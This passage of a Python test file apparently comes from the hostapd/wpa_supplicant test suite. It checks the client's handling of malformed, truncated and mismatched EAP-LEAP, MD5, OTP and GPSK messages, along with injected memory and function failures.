return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(leap_handler2)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_leap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_leap_process_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_leap_process_success"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_process_response"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_getKey"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1,
"nt_challenge_response;eap_leap_process_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
"""EAP-MD5 protocol tests"""
check_eap_capa(dev[0], "MD5")
def md5_handler(ctx, req):
logger.info("md5_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
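# EAP-MD5 (RFC 3748, section 5.4) reuses the CHAP challenge format: a
# 1-octet Value-Size, the challenge value itself and an optional name;
# the cases below omit or truncate those fields.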
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MD5)
if ctx['num'] == 2:
logger.info("Test: Zero-length challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
0)
if ctx['num'] == 3:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
1)
if ctx['num'] == 4:
logger.info("Test: Shortest possible challenge and name")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
return None
srv = start_radius_server(md5_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 4):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
"""EAP-MD5 local error cases"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(dev[0], 1, "chap_md5"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
"""EAP-OTP protocol tests"""
def otp_handler(ctx, req):
logger.info("otp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
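# EAP-OTP (RFC 3748, section 5.5) carries only a displayable challenge
# string as its Type-Data, so an empty payload and a 1-octet challenge
# exercise the relevant parsing paths.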
if ctx['num'] == 1:
logger.info("Test: Empty payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_OTP)
if ctx['num'] == 2:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
if ctx['num'] == 3:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
if ctx['num'] == 4:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
return None
srv = start_radius_server(otp_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 1):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-OTP"])
if ev is None:
raise Exception("Request for password timed out")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-OTP-" + id + ":password")
ev = dev[0].wait_event("CTRL-EVENT-EAP-SUCCESS")
if ev is None:
raise Exception("Success not reported")
finally:
stop_radius_server(srv)
def test_eap_proto_otp_errors(dev, apdev):
"""EAP-OTP local error cases"""
def otp_handler2(ctx, req):
logger.info("otp_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(otp_handler2)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_otp_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
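# EAP-GPSK op-codes as defined in RFC 5433. A GPSK-1 payload consists of
# a 2-octet ID_Server length, the ID_Server, a 32-octet RAND_Server, a
# 2-octet CSuite_List length and 6-octet CSuite entries (4-octet Vendor
# plus 2-octet Specifier); Vendor 0 / Specifier 1 below selects the
# mandatory-to-implement AES-based ciphersuite.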
def test_eap_proto_gpsk(dev, apdev):
"""EAP-GPSK protocol tests"""
def gpsk_handler(ctx, req):
logger.info("gpsk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_GPSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown opcode")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Too short GPSK-1")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated ID_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing RAND_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing CSuite_List")
return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Empty CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Invalid CSuite_List")
return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 No supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-1")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite but too short key")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[15:47]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Incorrect MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB4L",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
0, 0, 0, 0)
return msg
return None
srv = start_radius_server(gpsk_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 27):
if i == 12:
pw = "short"
else:
pw = "abcdefghijklmnop0123456789abcdef"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="GPSK", identity="user", password=pw,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
